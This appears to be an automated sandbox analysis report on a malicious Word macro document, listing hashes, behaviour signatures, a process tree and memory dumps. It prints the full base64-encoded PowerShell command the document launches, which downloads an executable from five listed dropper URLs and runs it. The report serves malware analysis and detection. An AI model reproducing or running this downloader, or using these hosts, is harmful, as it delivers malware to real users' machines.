107fd6be86b92cd124d49b967f2d1d719305db9f215eb21fcc0c5c65a7dc1e14

General

Target

5d796b4f80a7c7626db81ad6a55d3018_JaffaCakes118.doc
Size

241KB
MD5

5d796b4f80a7c7626db81ad6a55d3018
SHA1

976086afeee4e35ebec99e1b3a7176c9d16a08dc
SHA256

107fd6be86b92cd124d49b967f2d1d719305db9f215eb21fcc0c5c65a7dc1e14
SHA512

671d3921f67c1348b01beab6af5a5619ff6890f6805bfa96ace2f02d5bf22108a1aebb7b6eb3c5d2dde12be72118ff4ecd69daf2a00500824cc727a57b95d97e
SSDEEP

6144:Y77HUUUUUUUUUUUUUUUUUUUT52Vxygud92G1EBoBlf:Y77HUUUUUUUUUUUUUUUUUUUTCs/yeBlf

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://dorubi.com/lnoubt/fx/

exe.dropper

http://demo-progenajans.com/icceturkey/V81jki/

exe.dropper

http://autofashionfactory.com/HLIC/epReQJ/

exe.dropper

http://bedfont.com/selectbox/Q97C/

exe.dropper

http://bernielandry.com/wp-includes/J3h/

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

7 1988 powershell.exe
9 1988 powershell.exe
11 1988 powershell.exe

flow	pid	process
7	1988	powershell.exe
9	1988	powershell.exe
11	1988	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2464 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1988 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1988 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2464 WINWORD.EXE
2464 WINWORD.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
2464	WINWORD.EXE

pid	process
1988	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1988	powershell.exe

pid	process
2464	WINWORD.EXE
2464	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WINWORD.EXE

description	pid	process	target process
PID 2464 wrote to memory of 2092	2464	WINWORD.EXE	splwow64.exe
PID 2464 wrote to memory of 2092	2464	WINWORD.EXE	splwow64.exe
PID 2464 wrote to memory of 2092	2464	WINWORD.EXE	splwow64.exe
PID 2464 wrote to memory of 2092	2464	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d796b4f80a7c7626db81ad6a55d3018_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2464

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -enc JABqAGsAUQBDAHgAMQA9ACgAJwB6AEEAJwArACcARABYAEEAeAAnACsAJwBrACcAKQA7ACQARwBBAEEAUQBBAFEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQARwBYAEEAMQBBAGsANABjAD0AKAAnAGgAdAB0AHAAOgAnACsAJwAvACcAKwAnAC8AJwArACcAZABvAHIAJwArACcAdQBiAGkALgBjAG8AbQAvAGwAbgBvAHUAJwArACcAYgB0AC8AJwArACcAZgB4AC8AQABoACcAKwAnAHQAdABwADoALwAvAGQAZQBtAG8ALQBwAHIAbwAnACsAJwBnAGUAbgBhAGoAJwArACcAYQBuAHMALgBjAG8AbQAvAGkAYwBjACcAKwAnAGUAdAAnACsAJwB1AHIAawAnACsAJwBlACcAKwAnAHkALwBWADgAMQBqAGsAaQAvAEAAaAB0AHQAJwArACcAcAA6AC8ALwBhAHUAdAAnACsAJwBvAGYAYQBzACcAKwAnAGgAaQBvAG4AZgBhACcAKwAnAGMAdABvAHIAeQAuAGMAbwBtACcAKwAnAC8ASABMAEkAQwAvAGUAJwArACcAcABSAGUAUQBKAC8AQABoAHQAdABwADoALwAvAGIAZQBkAGYAJwArACcAbwAnACsAJwBuAHQALgBjAG8AbQAnACsAJwAvAHMAZQBsACcAKwAnAGUAYwAnACsAJwB0AGIAJwArACcAbwB4AC8AUQA5ADcAQwAvAEAAaAB0AHQAcAA6AC8ALwAnACsAJwBiAGUAJwArACcAcgBuAGkAZQBsAGEAbgBkAHIAeQAuAGMAbwBtAC8AdwBwAC0AaQBuACcAKwAnAGMAbAAnACsAJwB1AGQAZQBzAC8AJwArACcASgAzAGgAJwArACcALwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABjADEAUQBCAG8AQQA9ACgAJwBQAFEAQQAnACsAJwBVACcAKwAnAEEAQQBBADEAJwApADsAJAB3AEEAQQBEAEMAVQAgAD0AIAAoACcAMQAnACsAJwA4ADkAJwApADsAJABJAEIAUQBBAEMAQQA9ACgAJwBqACcAKwAnAFEARwBBAFUAUQAnACkAOwAkAHAAQgBBAFUAQQBfAF8AVQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdwBBAEEARABDAFUAKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABYAEcARABjAFgAQQB3AEEAIABpAG4AIAAkAEcAWABBADEAQQBrADQAYwApAHsAdAByAHkAewAkAEcAQQBBAFEAQQBRAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFgARwBEAGMAWABBAHcAQQAsACAAJABwAEIAQQBVAEEAXwBfAFUAKQA7ACQARgBBAEEAQQBaAG8AQwA9ACgAJwBwAGsARwBrACcAKwAnAEEAJwArACcAbwBrACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAHAAQgBBAFUAQQBfAF8AVQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAHAAQgBBAFUAQQBfAF8AVQA7ACQAUQB3AHgAQQBCAEMARABBAD0AKAAnAGoAbwBBADQAJwArACcAQQAnACsAJwBBACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABBAGsAUQAxAEEAQQBrAEEAPQAoACcATABEACcAKwAnAEEAQgAnACsAJwBCAEIAXwBBACcAKQA7AA==
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
1ad2440a9372685ad67be94804f48059

SHA1
f5a795675823a99372e680f567a736363ffe7976

SHA256
80e3fc8fa161f584fe27ba6cf808870fddc87e27a4a4353e955749fa25e059df

SHA512
a9172ce8dfef7eb8a31b16e235e3b4bed9310c660ee91067f8a06d843a6f89db0aa9976d8db3fc439d5a28fc281e4919b495bda1d9ae2833085a5a37a33a60f0

Download Submit
memory/1988-83-0x0000000001D10000-0x0000000001D18000-memory.dmp

Filesize
32KB

Download
memory/1988-82-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2464-16-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-62-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-76-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-75-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-15-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-73-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-72-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-14-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-46-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-13-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-29-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-21-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-20-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-18-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-17-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-0-0x000000002FEB1000-0x000000002FEB2000-memory.dmp

Filesize
4KB

Download
memory/2464-74-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-19-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-38-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-12-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-2-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

Filesize
44KB

Download
memory/2464-11-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-10-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-9-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-8-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-6-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-53-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-4-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-7-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-5-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-91-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

Filesize
44KB

Download
memory/2464-92-0x0000000000430000-0x0000000000530000-memory.dmp

Filesize
1024KB

Download
memory/2464-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2464-108-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads